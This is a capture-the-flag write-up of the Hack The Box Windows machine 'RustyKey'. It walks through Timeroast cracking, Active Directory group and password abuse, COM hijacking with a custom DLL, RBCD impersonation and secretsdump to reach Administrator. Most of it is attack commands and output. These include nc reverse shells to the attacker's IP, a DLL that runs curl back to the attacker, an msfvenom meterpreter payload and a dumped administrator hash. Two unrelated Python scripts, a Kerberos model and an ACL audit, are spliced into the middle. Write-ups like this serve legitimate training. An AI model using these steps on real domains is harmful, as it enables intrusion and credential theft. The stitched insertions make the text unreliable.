> m4rt@CTF_ARCHIVE:~$

Hack The Box / WINDOWS / 2026-03-18

Hack The Box — RustyKey (Windows)

Timeroast-based machine-account foothold, Helpdesk abuse and COM hijacking to pivot into delegation rights, then RBCD to impersonate backupadmin and reach Administrator.

Target

  • IP: 10.10.11.75

Machine information

As is common in real-life Windows penetration tests, you start the RustyKey box with credentials for the following account:

  • rr.parker / 8#t5HE8L!W3A

Recon

sudo nmap -sC -sV 10.10.11.75 -p- -T5 -v
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-02 03:39:56Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49671/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  msrpc         Microsoft Windows RPC
49692/tcp open  msrpc         Microsoft Windows RPC
52316/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Add rustykey.htb to /etc/hosts.

nxc smb 10.10.11.75 -u 'rr.parker' -p '8#t5HE8L!W3A'
SMB         10.10.11.75  445    10.10.11.75   [*]  x64 (name:10.10.11.75) (domain:10.10.11.75) (signing:True) (SMBv1:False)
SMB         10.10.11.75  445    10.10.11.75   [-] 10.10.11.75\rr.parker:8#t5HE8L!W3A STATUS_NOT_SUPPORTED
nxc ldap 10.10.11.75 -u 'rr.parker' -p '8#t5HE8L!W3A'
LDAP        10.10.11.75  389    dc.rustykey.htb  [*]  x64 (name:dc.rustykey.htb) (domain:rustykey.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.75  389    dc.rustykey.htb  [-] rustykey.htb\rr.parker:8#t5HE8L!W3A STATUS_NOT_SUPPORTED
NTLM authentication is rejected (STATUS_NOT_SUPPORTED), so we authenticate with Kerberos instead. Kerberos is sensitive to clock skew, so first sync the clock with the DC:

sudo ntpdate 10.10.11.75

Kerberos setup and initial enumeration

getTGT.py rustykey.htb/rr.parker:'8#t5HE8L!W3A' -dc-ip 10.10.11.75
[*] Saving ticket in rr.parker.ccache
export KRB5CCNAME='rr.parker.ccache'
nxc ldap 10.10.11.75 -d rustykey.htb -k --use-kcache
LDAP        10.10.11.75  389    dc.rustykey.htb  [*]  x64 (name:dc.rustykey.htb) (domain:rustykey.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.75  389    dc.rustykey.htb  [+] rustykey.htb\rr.parker from ccache

Add dc.rustykey.htb to /etc/hosts. Make sure it is the first name in the list, otherwise ldapsearch will not work.

nxc smb dc.rustykey.htb -d rustykey.htb -k --use-kcache --shares
SMB         dc.rustykey.htb 445    dc               [*]  x64 (name:dc) (domain:rustykey.htb) (signing:True) (SMBv1:False)
SMB         dc.rustykey.htb 445    dc               [+] rustykey.htb\rr.parker from ccache
SMB         dc.rustykey.htb 445    dc               [*] Enumerated shares
SMB         dc.rustykey.htb 445    dc               Share           Permissions     Remark
SMB         dc.rustykey.htb 445    dc               -----           -----------     ------
SMB         dc.rustykey.htb 445    dc               ADMIN$                          Remote Admin
SMB         dc.rustykey.htb 445    dc               C$                              Default share
SMB         dc.rustykey.htb 445    dc               IPC$            READ            Remote IPC
SMB         dc.rustykey.htb 445    dc               NETLOGON        READ            Logon server share
SMB         dc.rustykey.htb 445    dc               SYSVOL          READ            Logon server share

There does not seem to be anything interesting at first glance.

Get user list:

nxc smb dc.rustykey.htb -d rustykey.htb -k --use-kcache --rid-brute 5000 | grep SidTypeUser | cut -d: -f2 | cut -d \\ -f2 | cut -d' ' -f1 > users_2.txt
bloodhound-python -u rr.parker -k -no-pass -ns 10.10.11.75 -d 'rustykey.htb' -dc 'dc.rustykey.htb' -c All --zip
sudo bloodhound

Update /etc/krb5.conf with:

[realms]
  RUSTYKEY.HTB = {
    kdc = dc.rustykey.htb
    admin_server = dc.rustykey.htb
  }

[domain_realm]
  .rustykey.htb = RUSTYKEY.HTB
  rustykey.htb = RUSTYKEY.HTB

Timeroast and machine account compromise

Download Timeroast:

git clone https://github.com/SecuraBV/Timeroast.git
python3 Timeroast/timeroast.py dc.rustykey.htb

We get one $sntp-ms$ hash per computer account, each prefixed with the account's RID.


Put them in a file named hash.

./hashcat/hashcat -a 0 -m 31300 ./hash ./rockyou.txt --username

Or:

./john/run/john --wordlist=./rockyou.txt hash

We get:

1125 --> Rusty88!

1125 corresponds to IT-Computer3$.

The RID-to-account mapping can be found with ldapsearch or powerview.py.

Download powerview.py:

  • https://github.com/aniqfakhrul/powerview.py

python3 powerview.py/powerview.py rustykey.htb/rr.parker@dc.rustykey.htb --dc-ip 10.10.11.75 -k --no-pass
Get-DomainComputer

We also see this attribute:

msDS-SupportedEncryptionTypes     : RC4-HMAC

So the DC supports only rc4-hmac for Kerberos ticket requests.

getTGT.py rustykey.htb/'IT-Computer3$':'Rusty88!' -dc-ip 10.10.11.75
[*] Saving ticket in IT-Computer3$.ccache
export KRB5CCNAME='IT-Computer3$.ccache'

From BloodHound, IT-Computer3$ has an AddSelf relation to group helpdesk.

python3 bloodyAD/bloodyAD.py --host dc.rustykey.htb -d rustykey.htb --dc-ip 10.10.11.75 -k add groupMember 'helpdesk' 'IT-Computer3$'
[+] IT-Computer3$ added to helpdesk

From BloodHound, helpdesk has:

  • ForceChangePassword over ee.reed, gg.anderson, bb.morgan, and dd.ali
  • GenericWrite over dd.ali
  • AddMember over group protected objects

protected objects contains:

  • Group IT, which contains bb.morgan and gg.anderson
  • Group support, which contains ee.reed

protected objects is part of protected users, which is a special Active Directory group with stricter security policies:

  • https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/protected-users-security-group

Very important: after adding IT-Computer3$ to helpdesk, request a new ticket. Group membership is embedded in the TGT's PAC, so the old ticket does not carry the new group.

getTGT.py rustykey.htb/'IT-Computer3$':'Rusty88!' -dc-ip 10.10.11.75
[*] Saving ticket in IT-Computer3$.ccache
export KRB5CCNAME='IT-Computer3$.ccache'

Now we can change the passwords of the users listed above:

python3 bloodyAD/bloodyAD.py --host dc.rustykey.htb -d rustykey.htb --dc-ip 10.10.11.75 -k set password 'ee.reed' '!Kali12345678!'
[+] Password changed successfully!
python3 bloodyAD/bloodyAD.py --host dc.rustykey.htb -d rustykey.htb --dc-ip 10.10.11.75 -k set password 'gg.anderson' '!Kali12345678!'
[+] Password changed successfully!
python3 bloodyAD/bloodyAD.py --host dc.rustykey.htb -d rustykey.htb --dc-ip 10.10.11.75 -k set password 'bb.morgan' '!Kali12345678!'
[+] Password changed successfully!
python3 bloodyAD/bloodyAD.py --host dc.rustykey.htb -d rustykey.htb --dc-ip 10.10.11.75 -k set password 'dd.ali' '!Kali12345678!'

Here we get an error:

msldap.commons.exceptions.LDAPModifyException: Password can't be changed. It may be because the oldpass provided is not valid.
You can try to use another password change protocol such as smbpasswd, server error may be more explicit.

Instead, this works:

python3 bloodyAD/bloodyAD.py --host dc.rustykey.htb -d rustykey.htb --dc-ip 10.10.11.75 -k set password 'dd.ali' 'Winter2025!'

Things that did not work

Since helpdesk has GenericWrite over dd.ali, we can try targetedKerberoast.

Download:

  • https://github.com/ShutdownRepo/targetedKerberoast

python3 targetedKerberoast/targetedKerberoast.py -v --dc-ip 10.10.11.75 --dc-host dc.rustykey.htb -d rustykey.htb -u 'IT-Computer3$' -k --no-pass

A hash is printed.

Put it in a file named hash:

./hashcat-6.2.6/hashcat.bin -a 0 ./hash ./rockyou.txt

It does not crack.

We can also try pywhisker.

Download pywhisker:

git clone https://github.com/ShutdownRepo/pywhisker.git
python3 pywhisker/pywhisker/pywhisker.py -vv -d 'rustykey.htb' --dc-ip 10.10.11.75 --dc-host dc.rustykey.htb -d rustykey.htb -u 'IT-Computer3$' -k --no-pass --target dd.ali --action add
[+] PFX exportiert nach: bPBjjXCf.pfx
[i] Passwort für PFX: cQr3iHU2LeXuuN8LA1yC
[+] Saved PFX (#PKCS12) certificate & key at path: bPBjjXCf.pfx
[*] Must be used with password: cQr3iHU2LeXuuN8LA1yC
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
certipy cert -export -pfx bPBjjXCf.pfx -password cQr3iHU2LeXuuN8LA1yC -out "dd.ali.pfx"
[*] Data written to 'dd.ali.pfx'
certipy auth -dc-ip 10.10.11.75 -pfx dd.ali.pfx -username dd.ali -domain rustykey.htb

We get an error:

[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)

Also, even with the -ldap-shell option, it does not work.

Access as bb.morgan and Support group path

Try requesting TGTs for users whose passwords were changed.

Problem:

  • with ee.reed and bb.morgan we get KDC_ERR_ETYPE_NOSUPP(KDC has no support for encryption type)

This seems to be because those users belong to protected users. Users in that group must use AES to request tickets, but as seen above the DC only supports rc4-hmac.
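A simplified model of that failure, as an added example (not from the write-up): it decodes msDS-SupportedEncryptionTypes and applies the Protected Users rule that DES and RC4 cannot be used for Kerberos pre-authentication, then audits a constructed set of accounts. The real KDC also consults the domain's default encryption types, which this model leaves out; the per-account masks in the sample are constructed.

```python
# Bit flags of msDS-SupportedEncryptionTypes (MS-KILE section 2.2.7).
ETYPE_BITS = {
    0x01: "DES-CBC-CRC",
    0x02: "DES-CBC-MD5",
    0x04: "RC4-HMAC",
    0x08: "AES128-CTS-HMAC-SHA1-96",
    0x10: "AES256-CTS-HMAC-SHA1-96",
    0x20: "AES256-CTS-HMAC-SHA1-96-SK",
}

# Protected Users members may not use DES or RC4 for Kerberos pre-authentication.
BLOCKED_FOR_PROTECTED_USERS = {"DES-CBC-CRC", "DES-CBC-MD5", "RC4-HMAC"}


def decode_etypes(mask):
    """Translate an msDS-SupportedEncryptionTypes value into encryption type names."""
    return {name for bit, name in ETYPE_BITS.items() if mask & bit}


def predict_as_req(account_mask, in_protected_users):
    """Simplified KDC decision for an AS-REQ.

    Returns ("OK", usable etypes) or ("KDC_ERR_ETYPE_NOSUPP", empty set), mirroring
    the error seen for ee.reed and bb.morgan while IT was still in protected objects.
    Domain default encryption types are deliberately not modelled.
    """
    usable = decode_etypes(account_mask)
    if in_protected_users:
        usable -= BLOCKED_FOR_PROTECTED_USERS
    if not usable:
        return ("KDC_ERR_ETYPE_NOSUPP", set())
    return ("OK", usable)


# Constructed sample directory export (hypothetical masks, not real RustyKey data).
SAMPLE_ACCOUNTS = [
    {"name": "ee.reed",    "mask": 0x04, "protected": True},
    {"name": "bb.morgan",  "mask": 0x04, "protected": True},
    {"name": "dd.ali",     "mask": 0x04, "protected": False},
    {"name": "svc.backup", "mask": 0x1C, "protected": True},
]


def locked_out_protected_users(accounts):
    """Names of Protected Users members that would be rejected because only RC4/DES keys remain."""
    return [a["name"] for a in accounts
            if predict_as_req(a["mask"], a["protected"])[0] == "KDC_ERR_ETYPE_NOSUPP"]


if __name__ == "__main__":
    for a in SAMPLE_ACCOUNTS:
        status, etypes = predict_as_req(a["mask"], a["protected"])
        print(f"{a['name']:<12} {status:<22} {sorted(etypes)}")
    print("locked out:", locked_out_protected_users(SAMPLE_ACCOUNTS))
```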

With gg.anderson we get:

  • KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)

However, since IT-Computer3$ (through helpdesk) has AddMember on protected objects, we can remove group IT from protected objects.

export KRB5CCNAME='IT-Computer3$.ccache'
python3 bloodyAD/bloodyAD.py --host dc.rustykey.htb -d rustykey.htb --dc-ip 10.10.11.75 -k remove groupMember 'protected objects' 'IT'
[-] IT removed from protected objects

Request TGT as bb.morgan:

getTGT.py rustykey.htb/'bb.morgan':'!Kali12345678!' -dc-ip 10.10.11.75
[*] Saving ticket in bb.morgan.ccache
export KRB5CCNAME='bb.morgan.ccache'

Since bb.morgan is in Remote Management Users, we can get a shell with Evil-WinRM:

evil-winrm -i dc.rustykey.htb -r RUSTYKEY.HTB

We get a PowerShell shell, but it is unstable, so we switch to a reverse shell with nc64.exe.

Upload nc64.exe to target:

  • https://github.com/int0x33/nc.exe/raw/refs/heads/master/nc64.exe

Start listener:

rlwrap nc -vlnp 4444

On target machine:

.\nc64.exe -e cmd.exe 10.10.14.53 4444

We get a reverse shell.

Get PowerShell:

powershell

On desktop there is internal.pdf.

Download it with smbserver.py.

On attacker machine:

smbserver.py -smb2support -username test12 -password test12 share $(pwd)

On target machine:

net use \\10.10.14.53\share test12 /USER:test12

cp internal.pdf \\10.10.14.53\share

Inside it we read:

From: bb.morgan@rustykey.htb
To: support-team@rustykey.htb
Subject: Support Group - Archiving Tool Access
Date: Mon, 10 Mar 2025 14:35:18 +0100

Hey team,
As part of the new Support utilities rollout, extended access has been temporarily granted to allow
testing and troubleshooting of file archiving features across shared workstations.
This is mainly to help streamline ticket resolution related to extraction/compression issues reported
by the Finance and IT teams. Some newer systems handle context menu actions differently, so
registry-level adjustments are expected during this phase.
A few notes:
- Please avoid making unrelated changes to system components while this access is active.
- This permission change is logged and will be rolled back once the archiving utility is confirmed
stable in all environments.
- Let DevOps know if you encounter access errors or missing shell actions.

Thanks,
BB Morgan
IT Department

This suggests support can modify registry keys. Likely a COM hijacking path.

Useful site:

  • https://specterops.io/blog/2025/05/28/revisiting-com-hijacking/

To identify registry keys writable by support, use accesschk64.exe.

Download:

  • https://download.sysinternals.com/files/AccessChk.zip

Extract and upload accesschk64.exe to the victim.

.\accesschk64.exe -accepteula -q -s -k HKLM\Software\Classes\CLSID | Select-String SUPPORT -Context 5,5
HKLM\Software\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}
    R  APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES
>   RW RUSTYKEY\Support
    RW NT AUTHORITY\SYSTEM
    RW BUILTIN\Administrators
    R  BUILTIN\Users
  HKLM\Software\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32
    R  APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES
    RW BUILTIN\Administrators
>   RW RUSTYKEY\Support
    RW NT AUTHORITY\SYSTEM
    R  BUILTIN\Users
reg query 'HKLM\Software\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}' /s
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}
    (Default)    REG_SZ    7-Zip Shell Extension

HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32
    (Default)    REG_SZ    C:\Program Files\7-Zip\7-zip.dll
    ThreadingModel    REG_SZ    Apartment
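The same check that the accesschk and reg query output above performs by hand, as an added defender-side audit script (not part of the original write-up): it parses accesschk -q -k output, flags CLSID keys writable by principals other than the built-in administrative identities, and checks whether an InprocServer32 path points outside the standard install directories. The accesschk output embedded below is the one shown above; the trusted-principal and trusted-directory lists are my assumptions and should be tuned per environment.

```python
import re

# Principals that are expected to hold write access on HKLM COM registrations (assumed baseline).
TRUSTED_WRITERS = {
    "NT AUTHORITY\\SYSTEM",
    "BUILTIN\\Administrators",
    "NT SERVICE\\TrustedInstaller",
    "CREATOR OWNER",
}

# Directories an in-process COM server DLL is normally loaded from (assumed baseline).
TRUSTED_DLL_DIRS = ("c:\\program files\\", "c:\\program files (x86)\\", "c:\\windows\\")

# accesschk64.exe -q -s -k HKLM\Software\Classes\CLSID | Select-String SUPPORT -Context 5,5
# as shown above; Select-String marks matching lines with ">" and indents context lines.
ACCESSCHK_OUTPUT = r"""
HKLM\Software\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}
    R  APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES
>   RW RUSTYKEY\Support
    RW NT AUTHORITY\SYSTEM
    RW BUILTIN\Administrators
    R  BUILTIN\Users
  HKLM\Software\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32
    R  APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES
    RW BUILTIN\Administrators
>   RW RUSTYKEY\Support
    RW NT AUTHORITY\SYSTEM
    R  BUILTIN\Users
"""

KEY_RE = re.compile(r"^(HKLM|HKEY_LOCAL_MACHINE|HKCR|HKEY_CLASSES_ROOT)\\", re.IGNORECASE)
ACE_RE = re.compile(r"^(RW|R|W)\s+(\S.*)$")


def parse_accesschk(text):
    """Return {registry key: [(perm, principal), ...]} from accesschk -q -k output."""
    acl, current = {}, None
    for raw in text.splitlines():
        line = raw.lstrip("> ").rstrip()  # drop Select-String's marker and indentation
        if not line:
            continue
        if KEY_RE.match(line):
            current = line
            acl[current] = []
            continue
        m = ACE_RE.match(line)
        if m and current is not None:
            acl[current].append((m.group(1), m.group(2)))
    return acl


def find_weak_com_keys(text, trusted=TRUSTED_WRITERS):
    """(key, principal) pairs where a principal outside the trusted set can write a CLSID key.

    Write access on InprocServer32 lets that principal repoint (Default) to any DLL,
    which is the COM hijacking primitive discussed above.
    """
    trusted_upper = {t.upper() for t in trusted}
    return [(key, who) for key, aces in parse_accesschk(text).items()
            for perm, who in aces
            if "W" in perm and who.upper() not in trusted_upper]


def is_trusted_dll_path(path):
    """True if an InprocServer32 (Default) path sits under a standard install directory.
    Paths using environment variables such as %ProgramFiles% are not expanded here."""
    return path.strip('"').lower().startswith(TRUSTED_DLL_DIRS)


if __name__ == "__main__":
    for key, who in find_weak_com_keys(ACCESSCHK_OUTPUT):
        print(f"[!] {who} can write {key}")
    for p in (r"C:\Program Files\7-Zip\7-zip.dll", r"C:\tmp\hijack.dll"):
        print(("ok  " if is_trusted_dll_path(p) else "BAD ") + p)
```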

Since ee.reed is in support, we need a shell as ee.reed.

IT-Computer3$ can change that password.

Use its ticket:

export KRB5CCNAME='IT-Computer3$.ccache'
python3 bloodyAD/bloodyAD.py --host dc.rustykey.htb -d rustykey.htb --dc-ip 10.10.11.75 -k set password 'ee.reed' '!Kali12345678!'
[+] Password changed successfully!

Remove group support from protected objects (and therefore from protected users):

python3 bloodyAD/bloodyAD.py --host dc.rustykey.htb -d rustykey.htb --dc-ip 10.10.11.75 -k remove groupMember 'protected objects' 'support'
[-] support removed from protected objects

Download RunasCs and upload to victim:

  • https://github.com/antonioCoco/RunasCs

Start netcat listener:

rlwrap nc -vlnp 4444

On victim:

.\RunasCs.exe 'ee.reed' '!Kali12345678!' "C:\tmp\nc64.exe -e cmd.exe 10.10.14.53 4444"

We get a reverse shell as ee.reed.

Get PowerShell:

powershell

COM hijacking to mm.turner

Now we need to create a malicious DLL that the hijacked COM registration will load.

See the attached file hijack.cpp.

First, check whether we get code execution by having the DLL run this command:

system("curl http://10.10.14.53:7777/pwnd");

Install the MinGW cross-compiler and build the DLL:

sudo apt install g++-mingw-w64-x86-64
x86_64-w64-mingw32-g++ -shared -o hijack.dll hijack.cpp

Upload DLL to C:\tmp.

Start listener:

python3 -m http.server 7777

In PowerShell shell:

reg add "HKLM\Software\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32" /ve /d "C:\tmp\hijack.dll" /f
The operation completed successfully.

Wait. In the Python server terminal we get:

10.10.11.75 - - [10/Jul/2025 22:10:34] "GET /pwnd HTTP/1.1" 404 -

We have RCE, so we can get a reverse shell.

Replace the curl command in hijack.cpp with:

system("C:\\tmp\\nc64.exe -e cmd.exe 10.10.14.53 4444");

Recompile the DLL and upload it to the victim.

Start netcat listener:

rlwrap nc -vlnp 4444

Modify the registry key again with the same command as above.

Wait. We get a reverse shell.

whoami
rustykey\mm.turner

We are now user mm.turner.

Delegation abuse and domain compromise

From BloodHound, mm.turner is in group delegationmanager, which has AddAllowedToAct over the domain controller.

Follow the BloodHound instructions.

We should create a machine account.

Download Powermad and upload to victim:

  • https://github.com/Kevin-Robertson/Powermad/raw/refs/heads/master/Powermad.ps1

. .\Powermad.ps1

New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)

We get an error:

[-] Exception calling "SendRequest" with "1" argument(s): "The server cannot handle directory requests."

This is likely due to:

whoami /priv
Privilege Name                Description                    State
============================= ============================== ========
SeMachineAccountPrivilege     Add workstations to domain     Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

The privilege to add machine accounts is disabled.

We can try enabling it with Metasploit.

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=tun0 LPORT=4444 -f exe -o reverse.exe

Upload reverse.exe to victim.

On attacker machine:

msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set LHOST tun0
run

On victim:

.\reverse.exe

We get a Meterpreter session.

getprivs
shell
whoami /priv

Now SeMachineAccountPrivilege is enabled.

powershell
. .\Powermad.ps1

New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force) -Domain rustykey.htb -DomainController dc.rustykey.htb -Verbose

Still not working.

If we check the quota:

Get-ADDomain | Select-Object -ExpandProperty DistinguishedName | Get-ADObject -Properties 'ms-DS-MachineAccountQuota'
ms-ds-machineaccountquota
-------------------------
                        0

It is 0, so users cannot add machine accounts.

So the default BloodHound instructions do not work here.

From this site:

  • https://www.thehacker.recipes/ad/movement/dacl/

We note:

  • AddAllowedToAct, a write permission on an object's msDS-Allowed-To-Act-On-Behalf-Of-Other-Identity attribute, for Kerberos RBCD attacks

Useful site:

  • https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd

So we can configure Resource-Based Constrained Delegation (RBCD) on the DC and, instead of a new machine account, use IT-Computer3$, whose password we already know.

In the mm.turner shell:

Set-ADComputer 'DC' -PrincipalsAllowedToDelegateToAccount 'IT-Computer3$'

Verify:

Get-ADComputer 'DC' -Properties PrincipalsAllowedToDelegateToAccount

Back on the attacker machine, use IT-Computer3$ to request a service ticket for the DC while impersonating backupadmin:

getST.py -spn 'cifs/dc.rustykey.htb' -impersonate 'backupadmin' -dc-ip 10.10.11.75 -k -no-pass rustykey.htb/'IT-Computer3$':'Rusty88!'
[*] Saving ticket in backupadmin@cifs_dc.rustykey.htb@RUSTYKEY.HTB.ccache
export KRB5CCNAME='backupadmin@cifs_dc.rustykey.htb@RUSTYKEY.HTB.ccache'
nxc smb dc.rustykey.htb -d rustykey.htb -k --use-kcache
SMB         dc.rustykey.htb 445    dc               [*]  x64 (name:dc) (domain:rustykey.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         dc.rustykey.htb 445    dc               [+] rustykey.htb\backupadmin from ccache (Pwn3d!)

backupadmin is part of Enterprise Admins.

secretsdump.py -k -no-pass 'rustykey.htb'/'backupadmin'@'dc.rustykey.htb'

Among the hashes, we find Administrator:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:f7a351e12f70cc177a1d5bd11b28ac26:::
getTGT.py rustykey.htb/'Administrator' -hashes ':f7a351e12f70cc177a1d5bd11b28ac26' -dc-ip 10.10.11.75
[*] Saving ticket in Administrator.ccache
export KRB5CCNAME='Administrator.ccache'
evil-winrm -i dc.rustykey.htb -r RUSTYKEY.HTB

We get a shell as Administrator.

Useful notes

Kerberos-authenticated ldapsearch:

ldapsearch -Y GSSAPI -H ldap://dc.rustykey.htb -b "dc=rustykey,dc=htb" "(objectClass=person)" description

Obtain an rc4-hmac ticket:

ktutil
addent -password -p IT-Computer3$@RUSTYKEY.HTB -k 1 -e rc4-hmac
# enter password
wkt itcomp3.keytab
quit

A file itcomp3.keytab is created.

export KRB5CCNAME=/tmp/krb5cc_itcomp3
kinit -k -t itcomp3.keytab 'IT-Computer3$@RUSTYKEY.HTB'

We get the ticket.

We can access shares with smbclient:

smbclient -k '//dc.rustykey.htb/IPC$'

Note

Strangely, this did not work:

export KRB5CCNAME='IT-Computer3$.ccache'
smbclient -k '//dc.rustykey.htb/IPC$'

Using the ticket obtained with kinit, we can also change passwords, for example:

net rpc password "dd.ali" 'Winter2025!' -k -S "dc.rustykey.htb"